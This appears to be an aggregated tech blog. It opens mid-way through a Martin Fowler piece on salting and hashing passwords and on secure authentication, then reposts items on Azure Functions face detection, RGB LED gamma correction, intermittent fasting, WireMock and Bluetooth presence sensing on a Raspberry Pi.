hand, if we use "M3WIBNKBYVSJW4ZJ", we get
64e7d42fb1a19bcf0dc8a3533dd3766ba2d87fd7ab75eb7acb6c737593cef14e.
Now, if an attacker gets their hands on the password hash store, it is much more
expensive to brute force the passwords.

The salt doesn’t require any special protection like encryption or obfuscation.
It can live alongside the hash, or even encoded with it, as is the case with bcrypt.
If your password table or file falls into attacker hands access to the salt won’t
help them use a lookup table to mount an attack on the collection of hashes.

A salt should be globally unique per user. OWASP recommends 32 or 64-bit salt if
you can manage it, and NIST requires 128-bit at a minimum. A UUID will certainly
work and although probably overkill, it’s generally easy to generate, if costly
to store. Hashing and salting is a good start, but as we will see below, even
this might not be enough.

Use A Hash That’s Worth Its Salt

Sadly, all hashing algorithms are not created equal. SHA-1 and MD5 had been common
standards for a long time until the discovery of a low cost collision attack. Luckily
there are plenty of alternatives that are low-collision, and slow. Yes, slow. A slower
algorithm means that a brute force attack is more time consuming and therefore costlier
to run.

The best widely-available algorithms are now considered to be scrypt and bcrypt.
Because contemporary SHA algorithms and PBKDF2 are less resistant to attacks where GPUs
are used, they are probably not great long-term strategies. A side note: technically
Argon2, scrypt, bcrypt and PBKDF2 are key derivation functions that use
key stretching
techniques, but for our purposes, we can think of them as a mechanism
for creating a hash.

Hash Algorithm Use for passwords?
scrypt Yes
bcrypt Yes
SHA-1 No
SHA-2 No
MD5 No
PBKDF2 No
Argon2 watch (see sidebar)

In addition to choosing an appropriate algorithm, you want to make sure you have it
configured correctly. Key derivation functions have configurable iteration counts,
also known as work factor, so that as hardware gets faster, you can
increase the time it takes to brute force them. OWASP provides recommendations
on functions and configuration in their
Password Storage Cheat Sheet.
If you want to make your application a bit more future-proof, you can add the
configuration parameters in the password storage, too, along with the hash and salt.
That way, if you decide to increase the work factor, you can do so without breaking
existing users or having to do a migration in one shot. By including the name of
the algorithm in storage, too, you could even support more than one at the same
time allowing you to evolve away from algorithms as they are deprecated in favor
of stronger ones.

Once More with Hashing

Really the only change to the code above is that rather than storing the password
in clear text, you are storing the salt, the hash, and the work factor. That means
when a user first chooses a password, you will want to generate a salt
and hash the password with it. Then, during a login attempt, you will use the salt
again to generate a hash to compare with the stored hash. As in:

CREATE TABLE application_user (
    email_address VARCHAR(100) NOT NULL PRIMARY KEY,
    hash_and_salt VARCHAR(60) NOT NULL
)

def login(conn, email, password):
      result = conn.cursor().execute(
            "SELECT hash_and_salt FROM application_user WHERE email_address = ?",
            [email])
      user = result.fetchone()
       if user is not None:
            hashed = user[0].encode("utf-8")
            return is_hash_match(password, hashed)
      return False

def is_hash_match(password, hash_and_salt):
  salt = hash_and_salt[0:29]
  return hash_and_salt == bcrypt.hashpw(password, salt)

The example above uses the python bcrypt library, which stores the salt and the work factor in the
hash for you. If you print out the results of hashpw(), you can see them
embedded in the string. Not all libraries work this way. Some output a raw hash,
without salt and work factor, requiring you to store them in addition to the hash.
But the result is the same: you use the salt with a work factor, derive the hash,
and make sure it matches the one that was originally generated when the password
was first created.

Final Tips

This might be obvious, but all the advice above is only for situations where you
are storing passwords for a service that you control. If you are storing passwords
on behalf of the user to access another system, your job is considerably more difficult.
Your best bet is to just not do it since you have no choice but to store the password
itself, rather than a hash. Ideally the third party will be able to support a much
more appropriate mechanism like SAML, OAuth or a similar mechanism for this situation.
If not, you need to think through very carefully how you store it, where you store it and
who has access to it. It’s a very complicated threat model, and hard to get right.

Many sites create unreasonable limits on how long your password can be. Even if
you hash and salt correctly, if your password length limit is too small, or the
allowed character set too narrow, you substantially reduce the number of possible
passwords and increase the probability that the password can be brute forced.
OWASP recommends a length of at least eight
from a set that includes alphanumeric and symbolic characters.
Wikipedia references
a Georgia Tech study recommending
twelve random characters. The goal, in the end, is not length, but entropy, but
since you can’t effectively enforce how your users generate their passwords,
the following would leave in pretty good stead:

  • Minimum 12 alpha-numeric and symbolic [1]
  • A long maximum like 100 characters. OWASP recommends capping it at most 160
    to avoid susceptibility to denial of service attacks resulting from passing in
    extremely long passwords. You’ll have to decide if that’s really a concern for
    your application
  • Provide your users with some kind of text recommending that, if at all possible, they:
    • use a password manager
    • randomly generate a long password, and
    • don’t reuse the password for another site
  • Don’t prevent the user from pasting passwords into the password field. It makes
    many password managers unusable

If your security requirements are very stringent then you may want to think beyond
password strategy and look to mechanisms like two-factor authentication so you
aren’t over-reliant on passwords for security. Both
NIST and
Wikipedia have very detailed
explanations of the effects of character length and set limits on entropy. If you
are resources constrained, you can get quite specific about the cost of breaking
into your systems based on speed of GPU clusters and keyspace, but for most of
situations, this level of specificity just isn’t necessary to find an appropriate
password strategy.

In Summary

  • Hash and salt all passwords
  • Use an algorithm that is recognized as secure and sufficiently slow
  • Ideally, make your password storage mechanism configurable so it can evolve
  • Avoid storing passwords for external systems and services
  • Be careful not to set password size limits that are too small, or character
    set limits that are too narrow

Authenticate Users Safely

If we need to know the identity of our users, for example to control who receives specific content, we need to provide some form of authentication. If we want to retain information about a user between requests once they have authenticated, we will also need to support session management. Despite being well-known and supported by many full-featured frameworks, these two concerns are implemented incorrectly often enough that they have earned spot #2 in the OWASP Top 10.

Authentication is sometimes confused with authorization. Authentication confirms that a user is who they claim to be. For example, when you log into your bank, your bank can verify it is in fact you and not an attacker trying to steal the fortune you amassed selling your captioned cat pictures site. Authorization defines whether a user is allowed to do something. Your bank may use authorization to allow you to see your overdraft limit, but not allow you to change it. Session management ties authentication and authorization together. Session management makes it possible to relate requests made by a particular user. Without session management, users would have to authenticate during each request they sent to a web application. All three elements – authentication, authorization, and session management – apply to both human users and to services. Keeping these three separate in our software reduces complexity and therefore risk.

Figure 1

There are many methods of performing authentication. Regardless of which method you choose, it is always wise to try to find an existing, mature framework that provides the capabilities you need. Such frameworks have often been scrutinized over a long period of time and avoid many common mistakes. Helpfully, they often come with other useful features as well.

An overarching concern to consider from the start is how to ensure credentials remain private when a client sends them across the network. The easiest, and arguably only, way to achieve this is to follow our earlier advice to use HTTPS for everything.

One option is to use the simple challenge-response mechanism specified in the HTTP protocol for a client to authenticate to a server. When your browser encounters a 401 (Unauthorized) response that includes information about a challenge to access the resource, it will popup a window prompting you to enter your name and password, keeping them in memory for subsequent requests. This mechanism has some weaknesses, the most serious of which being that the only way for a user to logout is by closing their browser.

A safer option that allows you to manage the lifecycle of a user’s session after authenticating is by simply entering credentials through a web form. This can be as simple as looking up a username in a database table and comparing the hash of a password using an approach we outlined in our earlier section on hashing passwords. For example, using Devise, a popular framework for Ruby on Rails, this can be done by registering a module for password authentication in the model used to represent a User, and instructing the framework to authenticate users before requests are processed by controllers.

# Register Devise’s database_authenticatable module in our User model to
# handle password authentication using bcrypt. We can optionally tune the work
# factor with the 'stretches' option.
class User < ActiveRecord::Base
  devise :database_authenticatable 
end

# Superclass to inherit from in controllers that require authentication
class AuthenticatedController < ApplicationController
  before_action :authenticate_user!
end

Understand Your Options

Although authenticating using a username and a password works well for many systems, it isn’t our only option. We can rely on external service providers where users may already have accounts to identify them. We can also authenticate users using a variety of different factors: something you know, such as a password or a PIN, something you have, such as your mobile phone or a key fob, and something you are, such as your fingerprints. Depending on your needs, some of these options may be worth considering, while others are helpful when we want to add an extra layer of protection.

One option that offers a convenience for many users is to allow them to log in using their existing account on popular services such as Facebook, Google, and Twitter, using a service called Single Sign-On (SSO). SSO allows users to log in to different systems using a single identity managed by an identity provider. For example, when visiting a website you may see a button that says “Sign in with Twitter” as an authentication option. To achieve this, SSO relies on the external service to manage logging the user in and to confirm their identity. The user never provides any credentials to our site.

SSO can significantly reduce the amount of time it takes to sign up for a site and eliminates the need for users to remember yet another username and password. However, some users may prefer to keep their use of our site private and not connect it to their identity elsewhere. Others may not have an existing account with the external providers we support. It is always preferable to allow users to register by manually entering their information as well.

A single factor of authentication such as a username and password is sometimes not enough to keep users safe. Using other factors of authentication can add an additional layer of security to protect users in the event a password is compromised. With Two-Factor Authentication (2FA), a second, different factor of authentication is required to confirm the identity of a user. If something the user knows, such as a username and password, is used as the first factor of authentication, a second factor could be something the user has, such as a secret code generated using software on their mobile phone or by a hardware token. Verifying a secret code sent to a user via SMS text message was once a popular way of doing this, but it is now deprecated due to presenting various risks. Applications like Google Authenticator and a multitude of other products and services can be safer and are relatively easy to implement, although any option will increase complexity of an application and should be considered mainly when applications maintain sensitive data.

Reauthenticate For Important Actions

Authentication isn’t only important when logging in. We can also use it to provide additional protection when users perform sensitive actions such as changing their password or transferring money. This can help limit the exposure in the event a user’s account is compromised. For example, some online merchants require you to re-enter details from your credit card when making a purchase to a newly-added shipping address. It is also helpful to require users to re-enter their passwords when updating their personal information.

Conceal Whether Users Exist

When a user makes a mistake entering their username or password, we might see a website respond with a message like this: The user ID is unknown. Revealing whether a user exists can help an attacker enumerate accounts on our system to mount further attacks against them or, depending on the nature of the site, revealing the user has an account may compromise their privacy. A better, more generic, response might be: Incorrect user ID or password.

This advice doesn’t just apply when logging in. Users can be enumerated through many other functions of a web application, for example when signing up for an account or resetting their password. It is good to be mindful of this risk and avoid disclosing unnecessary information. One alternative is to send an email with a link to continue their registration or a password reset link to a user after they enter their email address, instead of outputting a message indicating whether the account exists.

Preventing Brute Force Attacks

An attacker might try to conduct a brute force attack to guess account passwords until they find one that works. With attackers increasingly using large networks of compromised systems referred to as botnets to conduct attacks with, finding an effective solution to protect against this while not impacting service continuity is a challenging task. There are many options we can consider, some of which we’ll discuss below. As with most security decisions, each provides benefits but also comes with tradeoffs.

A good starting point that will slow an attacker down is to lock users out temporarily after a number of failed login attempts. This can help reduce the risk of an account being compromised, but it can also have the unintended effect of allowing an attacker to cause a denial-of-service condition by abusing it to lock users out. If the lockout requires an administrator to unlock accounts manually, it can cause a serious disruption to service. In addition, account lockout could be used by an attacker to determine whether accounts exist. Still, this will make things difficult for an attacker and will deter many. Using short lockouts of between 10 to 60 seconds can be an effective deterrent without imposing the same availability risks.

Another popular option is to use is CAPTCHAs, which attempt to deter automated attacks by presenting a challenge that a human can solve but a computer can not. Oftentimes it seems as though they present challenges that can be solved by neither. These can be part of an effective strategy, but they have become decreasingly effective and face criticisms. Advancements have made it possible for computers to solve challenges with greater accuracy, and it has become inexpensive to hire human labor to solve them. They can also present problems for people with vision and hearing impairments, which is an important consideration if we want our site to be accessible.

Layering these options has been used as an effective strategy on sites that see frequent brute force attacks. After two login failures occur for an account, a CAPTCHA might be presented to the user. After several more failures, the account might be locked out temporarily. If that sequence of failures repeats again, it might make sense to lock the account once again, this time sending an email to the account owner requiring them to unlock the account using a secret link.

Don’t Use Default Or Hard-Coded Credentials

Shipping software with default credentials that are easy to guess presents a major risk for users and applications alike. It may seem like it is providing a convenience for users, but in reality this couldn’t be further from the truth. It common to see this in embedded systems such as routers and IoT devices, which can immediately become easy targets once connected to networks. Better options might be requiring users to enter unique one-time passwords and then forcing the user to change it, or preventing the software from being accessed externally until a password is set.

Sometimes hard-coded credentials are added to applications for development and debugging purposes. This presents risks for the same reasons and might be forgotten about before the software ships. Worse, it may not be possible for the user to change or disable the credentials. We must never hard-code credentials in our software.

In Frameworks

Most web application frameworks include authentication implementations that support a variety of authentication schemes, and there are many other third party frameworks to choose from as well. As we stated earlier, it is preferable to try to find an existing, mature framework that suits your needs. Below are some examples to to get you started.

Framework Approaches
Java Apache Shiro
OACC
Spring Spring Security
Ruby on Rails Devise
ASP.NET ASP.NET Core authentication
Built-in Authentication Providers
Play play-silhouette
Node.js Passport framework

In Summary

  • Use existing authentication frameworks whenever possible instead of creating one yourself
  • Support authentication methods that make sense for your needs
  • Limit the ability of an attacker to take control of an account
  • You can take steps to prevent attacks to identify or compromise accounts
  • Never use default or hard-coded credentials

if you found this article useful, please share it. I appreciate the feedback and encouragement

For articles on similar topics…

…take a look at the tag: clean code

from Martin Fowler http://ift.tt/2aUew67

What is Serverless Computing? Exploring Azure Functions

Filed under: Uncategorized — ketan @ 2:53 AM

There’s a lot of confusing terms in the Cloud space. And that’s not counting the term "Cloud." 😉

  • IaaS (Infrastructure as a Services) – Virtual Machines and stuff on demand.
  • PaaS (Platform as a Service) – You deploy your apps but try not to think about the Virtual Machines underneath. They exist, but we pretend they don’t until forced.
  • SaaS (Software as a Service) – Stuff like Office 365 and Gmail. You pay a subscription and you get email/whatever as a service. It Just Works.

"Serverless Computing" doesn’t really mean there’s no server. Serverless means there’s no server you need to worry about. That might sound like PaaS, but it’s higher level that than.

Serverless Computing is like this – Your code, a slider bar, and your credit card. You just have your function out there and it will scale as long as you can pay for it. It’s as close to "cloudy" as The Cloud can get.

Serverless Computing is like this. Your code, a slider bar, and your credit card.

With Platform as a Service, you might make a Node or C# app, check it into Git, deploy it to a Web Site/Application, and then you’ve got an endpoint. You might scale it up (get more CPU/Memory/Disk) or out (have 1, 2, n instances of the Web App) but it’s not seamless. It’s totally cool, to be clear, but you’re always aware of the servers.

New cloud systems like Amazon Lambda and Azure Functions have you upload some code and it’s running seconds later. You can have continuous jobs, functions that run on a triggered event, or make Web APIs or Webhooks that are just a function with a URL.

I’m going to see how quickly I can make a Web API with Serverless Computing.

I’ll go to http://ift.tt/1VqOHhk and make a new function. If you don’t have an account you can sign up free.

Getting started with Azure Functions

You can make a function in JavaScript or C#.

Getting started with Azure Functions - Create This Function

Once you’re into the Azure Function Editor, click "New Function" and you’ve got dozens of templates and code examples for things like:

  • Find a face in an image and store the rectangle of where the face is.
  • Run a function and comment on a GitHub issue when a GitHub webhook is triggered
  • Update a storage blob when an HTTP Request comes in
  • Load entities from a database or storage table

I figured I’d change the first example. It is a trigger that sees an image in storage, calls a cognitive services API to get the location of the face, then stores the data. I wanted to change it to:

  • Take an image as input from an HTTP Post
  • Draw a rectangle around the face
  • Return the new image

You can do this work from Git/GitHub but for easy stuff I’m literally doing it all in the browser. Here’s what it looks like.

Azure Functions can be done in the browser

I code and iterate and save and fail fast, fail often. Here’s the starter code I based it on. Remember, that this is a starter function that runs on a triggered event, so note its Run()…I’m going to change this.

#r "Microsoft.WindowsAzure.Storage"
#r "Newtonsoft.Json"
using System.Net;
using System.Net.Http;
using System.Net.Http.Headers;
using Newtonsoft.Json;
using Microsoft.WindowsAzure.Storage.Table;
using System.IO; 
public static async Task Run(Stream image, string name, IAsyncCollector<FaceRectangle> outTable, TraceWriter log)
{
    var image = await req.Content.ReadAsStreamAsync();
    
    string result = await CallVisionAPI(image); //STREAM
    log.Info(result); 
    if (String.IsNullOrEmpty(result))
    {
        return req.CreateResponse(HttpStatusCode.BadRequest);
    }
    ImageData imageData = JsonConvert.DeserializeObject<ImageData>(result);
    foreach (Face face in imageData.Faces)
    {
        var faceRectangle = face.FaceRectangle;
        faceRectangle.RowKey = Guid.NewGuid().ToString();
        faceRectangle.PartitionKey = "Functions";
        faceRectangle.ImageFile = name + ".jpg";
        await outTable.AddAsync(faceRectangle); 
    }
    return req.CreateResponse(HttpStatusCode.OK, "Nice Job");  
}
static async Task<string> CallVisionAPI(Stream image)
{
    using (var client = new HttpClient())
    {
        var content = new StreamContent(image);
        var url = "http://ift.tt/2bnA8uZ;;
        client.DefaultRequestHeaders.Add("Ocp-Apim-Subscription-Key", Environment.GetEnvironmentVariable("Vision_API_Subscription_Key"));
        content.Headers.ContentType = new MediaTypeHeaderValue("application/octet-stream");
        var httpResponse = await client.PostAsync(url, content);
        if (httpResponse.StatusCode == HttpStatusCode.OK){
            return await httpResponse.Content.ReadAsStringAsync();
        }
    }
    return null;
}
public class ImageData {
    public List<Face> Faces { get; set; }
}
public class Face {
    public int Age { get; set; }
    public string Gender { get; set; }
    public FaceRectangle FaceRectangle { get; set; }
}
public class FaceRectangle : TableEntity {
    public string ImageFile { get; set; }
    public int Left { get; set; }
    public int Top { get; set; }
    public int Width { get; set; }
    public int Height { get; set; }
}

GOAL: I’ll change this Run() and make this listen for an HTTP request that contains an image, read the image that’s POSTed in (ya, I know, no validation), draw rectangle around detected faces, then return a new image.

public static async Task<HttpResponseMessage> Run(HttpRequestMessage req, TraceWriter log) {

var image = await req.Content.ReadAsStreamAsync();

As for the body of this function, I’m 20% sure I’m using too many MemoryStreams but they are getting disposed so take this code as a initial proof of concept. However, I DO need at least the two I have. Regardless, happy to chat with those who know more, but it’s more subtle than even I thought. That said, basically call out to the API, get back some face data that looks like this:

2016-08-26T23:59:26.741 {"requestId":"8be222ff-98cc-4019-8038-c22eeffa63ed","metadata":{"width":2808,"height":1872,"format":"Jpeg"},"faces":[{"age":41,"gender":"Male","faceRectangle":{"left":1059,"top":671,"width":466,"height":466}},{"age":41,"gender":"Male","faceRectangle":{"left":1916,"top":702,"width":448,"height":448}}]}

Then take that data and DRAW a Rectangle over the faces detected.

public static async Task<HttpResponseMessage> Run(HttpRequestMessage req, TraceWriter log)
{
    var image = await req.Content.ReadAsStreamAsync();
    MemoryStream mem = new MemoryStream();
    image.CopyTo(mem); //make a copy since one gets destroy in the other API. Lame, I know.
    image.Position = 0;
    mem.Position = 0;
    
    string result = await CallVisionAPI(image); 
    log.Info(result); 
    if (String.IsNullOrEmpty(result)) {
        return req.CreateResponse(HttpStatusCode.BadRequest);
    }
    
    ImageData imageData = JsonConvert.DeserializeObject<ImageData>(result);
    MemoryStream outputStream = new MemoryStream();
    using(Image maybeFace = Image.FromStream(mem, true))
    {
        using (Graphics g = Graphics.FromImage(maybeFace))
        {
            Pen yellowPen = new Pen(Color.Yellow, 4);
            foreach (Face face in imageData.Faces)
            {
                var faceRectangle = face.FaceRectangle;
                g.DrawRectangle(yellowPen, 
                    faceRectangle.Left, faceRectangle.Top, 
                    faceRectangle.Width, faceRectangle.Height);
            }
        }
        maybeFace.Save(outputStream, ImageFormat.Jpeg);
    }
    
    var response = new HttpResponseMessage()
    {
        Content = new ByteArrayContent(outputStream.ToArray()),
        StatusCode = HttpStatusCode.OK,
    };
    response.Content.Headers.ContentType = new MediaTypeHeaderValue("image/jpeg");
    return response;
}

 

Now I go into Postman and POST an image to my new Azure Function endpoint. Here I uploaded a flattering picture of me and unflattering picture of The Oatmeal. He’s pretty in real life just NOT HERE. 😉

Image Recognition with Azure Functions

So in just about 15 min with no idea and armed with just my browser, Postman (also my browser), Google/StackOverflow, and Azure Functions I’ve got a backend proof of concept.

Azure Functions supports Node.js, C#, F#, Python, PHP *and* Batch, Bash, and PowerShell, which really opens it up to basically anyone. You can use them for anything when you just want a function (or more) out there on the web. Send stuff to Slack, automate your house, update GitHub issues, act as a Webhook, etc. There’s some great 3d party Azure Functions sample code in this GitHub repo as well. Inputs can be from basically anywhere and outputs can be basically anywhere. If those anywheres are also cloud services like Tables or Storage, you’ve got a "serverless backed" that is easy to scale.

I’m still learning, but I can see when I’d want a VM (total control) vs a Web App (near total control) vs a "Serverless" Azure Function (less control but I didn’t need it anyway, just wanted a function in the cloud.)


Sponsor: Aspose makes programming APIs for working with files, like: DOC, XLS, PPT, PDF and countless more.  Developers can use their products to create, convert, modify, or manage files in almost any way.  Aspose is a good company and they offer solid products.  Check them out, and download a free evaluation.


© 2016 Scott Hanselman. All rights reserved.

     

from Hanselman http://ift.tt/2bEOEin

August 23, 2016

Article: Growing Agile… Not Scaling!

Filed under: Uncategorized — ketan @ 11:44 PM

What makes an agile team successful is not the “process” nor the “tools” but rather the way people develop an effective level of interaction with each other. Growing agile means both focusing on culture, and on co-evolution of practices and tools.

By Andrea Tomasini & Dhaval Panchal

from InfoQ http://ift.tt/2a5brA7

Article: Working with Multiple Databases in Spring

Filed under: Uncategorized — ketan @ 9:39 PM

Accessing multiple databases in enterprise applications can be a challenge. With Spring it is easy enough to define a common data source, but once we introduce multiple data sources things get tricky. This article demos a technique for accessing multiple databases in Spring Boot applications easily and with minimum configuration.

By Aaron Jacobson

from InfoQ http://ift.tt/2aREQzl

Scaling Teams to Grow Effective Organizations

Filed under: Uncategorized — ketan @ 9:33 PM

When organizations are growing fast it can be a challenge to keep them sane and to achieve what you actually want to achieve by hiring more people: getting more done. Alexander Grosse talked about how you scale teams to build an effective organization at Spark the Change London 2016. He explored the five domains of scaling teams: Hiring, People Management, Organization, Culture, and Communication.

By Ben Linders

from InfoQ http://ift.tt/2ba3xKP

RGB LEDs: How to Master Gamma and Hue for Perfect Brightness

Filed under: Uncategorized — ketan @ 7:09 PM

You would think that there’s nothing to know about RGB LEDs: just buy a (strip of) WS2812s with integrated 24-bit RGB drivers and start shuffling in your data. If you just want to make some shinies, and you don’t care about any sort of accurate color reproduction or consistent brightness, you’re all set.

But if you want to display video, encode data in colors, or just make some pretty art, you might want to think a little bit harder about those RGB values that you’re pushing down the wires. Any LED responds (almost) linearly to pulse-width modulation (PWM), putting out twice as much light when it’s on for twice as long, but the human eye is dramatically nonlinear. You might already know this from the one-LED case, but are you doing it right when you combine red, green, and blue?

It turns out that even getting a color-fade “right” is very tricky. Surprisingly, there’s been new science done on color perception in the last twenty years, even though both eyes and colors have been around approximately forever. In this shorty, I’ll work through just enough to get things 95% right: making yellows, magentas, and cyans about as bright as reds, greens, and blues. In the end, I’ll provide pointers to getting the last 5% right if you really want to geek out. If you’re ready to take your RGB blinkies to the next level, read on!

Gamma

If you’ve ever dimmed a single LED using pulse-width modulation (PWM) before, you have certainly noticed that the response is non-linear. If you ramp up the duty cycle from 0% to 100%, it looks like the LED gets brighter very quickly in the beginning and then somewhere around the 50% mark stops getting brighter at all. On a WS2812, with its eight-bit-per-color resolution, stepping from a red value of 5 to a red value of 10 more than doubles the apparent brightness, while stepping from 250 to 255 can barely be noticed at all.

It’s not the LED or the PWM controlling it that’s to blame, however. It’s your eyes.. We perceive brightness using some kind of power law: if B is perceived brightness and L is the luminance — the amount of physical light that’s getting through your irises — the relationship looks roughly something like this:

B = L^\frac{1}{\gamma} \mbox{ or } L = B^\gamma

brightness_intensityThat exponential relationship, requiring more and more additional light to create a perceptible difference in brightness, is characterized by that Greek exponent: gamma. For your intuition, gamma values from just around 1.5 to around 3 are probably reasonable to consider. Arbitrarily picking gamma to be 2 makes that fractional gamma exponent into a more comfortable square root and usually isn’t too far wrong. 2.2 is a standard value for CRT monitors in the PC world, and 1.8 used to be the standard for Macs.

But if you really care about the way your LEDs look, you’ll want to tweak the gamma to your particular conditions. I like to think of choosing a gamma in terms of black-and-white photography. If we gamma-correct with a value that’s bigger than your eye’s natural gamma an image will look too contrasty — there will be jumps in the brightness where you’d want it to be smooth. If the gamma is set lower than your eye’s gamma, differences will be muted, and it will look muddy. Get it just right, and you get a smooth transition from dark to light across the full range.

Taking the 2.314’th root of a given number is a tall task to ask of a microcontroller, though, and it’s probably overkill. In the end, I usually implement the gamma correction as a lookup table that turns the desired brightness directly into whatever numbers the chip’s PWM routine wants, so there’s no math left to do at all at runtime. Here’s a quick and dirty Python script that will generate the lookup table for you.

Now in Color

a-much-larger-version-of-ping-pong-rainbow-display-e1343321856537Gamma correction can make your single-color LED effects look a lot better. But what happens when you step up from monochrome to RGB color? Imagine that you’ve gone through the whole gamma experiment above with just the red channel of a WS2812 LED. Now you add the green and blue LEDs to the mix. How much brighter does it seem? If you weren’t paying attention above (yawn, math!) you’d say three times brighter. The right answer is the gamma’th root of three.

Strictly speaking, computing brightness depends on the mix of light coming out of all three LEDs. The good news is that you can also figure out the brightness of any arbitrary color combination with gammas. Here’s the formula:

B = \left( R^\gamma + G^\gamma + B^\gamma\right)^\frac{1}{\gamma}

Given any ratio of red to green to blue, you can use this formula to work out the PWM values for each LED that you need to brighten or dim the overall color in equally-sized steps.

Cross-Fading

crossfade_intensityThe other use of the brightness formula above is in fading from one color to another, keeping the perceived brightness constant. For instance, to fade from red to blue naïvely, you might start at (255,0,0) and head over toward (0,0,255) by subtracting some red and adding the same amount of blue. Plugging those values into the brightness formula, the result appears significantly dimmer in the middle: down to about 70% of the brightness of the pure colors. Unfortunately, this is the way that nearly everyone online tells you to do it. That doesn’t make it right. (Or maybe they just don’t care about brightness?)

A great way to figure out the gamma that you’d like for RGB LEDs is to set up a color fade and adjust the gamma until there is apparently uniform brightness across the strip. In fact, you can do this with just three LEDs. To make the effect most dramatic, it helps to start with medium brightness on either end of the fade: I’ll use (70,0,0) and (0,70,0) for instance. The middle LED should be some kind of yellow with equal parts of red and green. Tweak the amounts of these values until you think that all three LEDs are about the same brightness, and you can solve for your personal gamma.

Color Palettes and Lookup Tables

eye-sphereOn a slow microcontroller, or on one that should be doing more important things with its CPU time than computing colors, constantly adjusting color values for brightness is a no-go. In the single-LED case, a lookup table worked well. But in RGB space, a three-dimensional array is needed. For a small number of colors, this can still be workable: five levels of red, blue, and green produces a palette with only 125 (53) entries. If you’ve got flash memory to spare, you can extend this as far as you’d like.

An alternative workaround is to gamma-adjust the individual channels first. This gets the brightness right, but it also affects the rate at which the hue changes across the cross-fade. You might like this effect or you might not — the best is to experiment. It’s certainly simple.

Color Sensitivity and Other Details

For me, getting control of the brightness of a color LED is about 95% of the battle. The remaining 5% is in getting precise control of the hue. That said, there are two quirks of the human visual system that matter for the hues.

The situation with the cross-fade of colors is actually more complicated than I’ve made them out to be; the eye isn’t uniformly sensitive to each wavelength of light. If you mixed together 10 lumens of red, 10 lumens of green, and 10 lumens of blue, the result would look overwhelmingly blue. The good news is that this effect is so strong that monitor and RGB LED manufacturers pre-weight the amount of light coming out of each LED for you.

So when you assign a value of (10%, 10%, 10%) to an RGB LED, each of the red, green, and blue LEDs are on for 10% of the time, but the green LED is about three times brighter than the red, and ten times brighter than the blue. The LEDs used take care of the (rough) color-balancing for you, so at least that’s one thing that you don’t have to worry about.

Perceptual Uniformity of Hue

RainbowEdgesIf you’re trying to encode numerical values in colors, however, there’s one last quirk of the human perceptual system that you might want to be aware of. We are more sensitive to differences in some colors than in others. In particular, hues around the yellow and cyan regions are really easy for us to distinguish, while different shades of reds and blues are much more difficult. Getting this right is non-trivial, not least because our perception of one color depends on the colors that it’s surrounded by. (Remember the “white and gold” dress?)

Anyway, here’s a library that does pretty darn well at addressing the perceptual uniformity of hues issue, given they’re constrained to using piecewise linear functions. They sacrifice some degree of uniform brightness to get there, though.

If you just need a few colors along a perceptually uniform color gradient, Color Brewer has your back. Python’s matplotlib is going to change its default color scale to one with significantly increased perceptual uniformity and constant brightness, and this video explaining why and how has a great overview of the subject. It’s not simple, but at least they’re getting it right.

Finally, if you’d really like to dive into color theory, this series has much more detail than you’re ever likely to need to know.

Conclusion

You can get lost in colors fairly easily, and it’s fun and rewarding to geek out a bit. On the other hand, you can make your LED blinky toys look a lot better just by getting the brightness right, and you do that by figuring out the appropriate gamma for your situation and applying a little math. The “right” gamma is a matter of trial and error, but something around two should work OK for starters. Give it a shot and let me know what you think in the comments. Or better yet, use RGB-gamma-correction in your next project and show us all.

Filed under: Engineering, Hackaday Columns, how-to, led hacks

from Hack a Day http://ift.tt/2bKnd4p

Intermittent Fasting

Filed under: Uncategorized — ketan @ 6:40 AM

if-1

A core tenet of biohacking is Intermittent Fasting (IF). This means having a cycle time between eating periods. One of the more popular durations is the 16 : 8. That is sixteen hours of fasting and an eight hour feeding window. This could look something like stop eating at 7pm in the evening and resume eating again the next day at 11am. The idea being that a metabolic shift will take place that increases fat burning and results in the body being fueled to some degree by ketones.

Some interesting resources to check out on intermittent fasting are:

Bulletproof Diet and Intermittent Fasting – My 1.5 Year Results

if-3

Quantified Bob was recently interviewed on the Ben Greenfield Podcast. Bob takes his research seriously and does a great job of sharing his results over extended periods of time. He is a capable software / hardware guy so he is not afraid of a little soldering to make things talk. His post on following the Bulletproof Diet and intermittent fasting for 1.5 years is loaded with valuable tips and medical updates.

if-4

The Secrets to Intermittent Fasting by Malik Johnson available on Amazon Kindle Unlimited provides a clear explanation of the different type of intermittent fasting approaches. Malik also shares historical explanations for fasting which provide some context.

This is about as extreme as one can go with intermittent fasting. Dr. Nun S. Amen Ra is a vegan weightlifting champion who eats one meal a day.

Please remember that this is a biohacking post meant to provide ideas for self improvement. We are biohackers that participate in these activities. Intermittent Fasting could be a bad idea.

from Adafruit Blog http://ift.tt/2bvnpnB

August 22, 2016

5 More Clever Tool Storage Solutions

Filed under: Uncategorized — ketan @ 7:41 PM

Here are a few more storage ideas to keep your shop re-org juices flowing.

Read more on MAKE

The post 5 More Clever Tool Storage Solutions appeared first on Make: DIY Projects and Ideas for Makers.

from MAKE Magazine http://ift.tt/2bHBikk

August 20, 2016

API Mocking Tool WireMock v2 Released with Improved Request Matching and Stub Management

Filed under: Uncategorized — ketan @ 9:53 PM

WireMock v2, an API mocking and service virtualisation tool, has been released. Core enhancements include improved request verification failure reporting, the ability to create custom request matching logic (including the use of Java 8 lambdas), randomly distributed delays (currently with uniform and lognormal distributions), and matching on cookies and basic auth headers.

By Daniel Bryant

from InfoQ http://ift.tt/2bkQd5u

Sniffing Bluetooth Devices With A Raspberry Pi

Filed under: Uncategorized — ketan @ 12:50 PM

Sniffing Bluetooth Devices With A Raspberry Pi

Hackaday was at HOPE last weekend, and that means we got the goods from what is possibly the best security conference on the east coast. Some of us, however, were trapped in the vendor area being accosted by people wearing an improbable amount of Mr. Robot merch asking, ‘so what is Hackaday?’. We’ve all seen The Merchants Of Cool, but that doesn’t mean everyone was a vapid expression of modern marketing. Some people even brought some of their projects to show off. [Jeff] of reelyActive stopped by the booth and showed off what his team has been working on. It’s a software platform that turns all your wireless mice, Fitbits, and phones into a smart sensor platform using off the shelf hardware and a connection to the Internet.

[Jeff]’s demo unit (shown above) is simply a Raspberry Pi 3 with WiFi and Bluetooth, and an SD card loaded up with reelyActive’s software. Connect the Pi to the Internet, and you have a smart space that listens for local Bluetooth devices and relays the identity and MAC address of all Bluetooth devices in range up to the Internet.

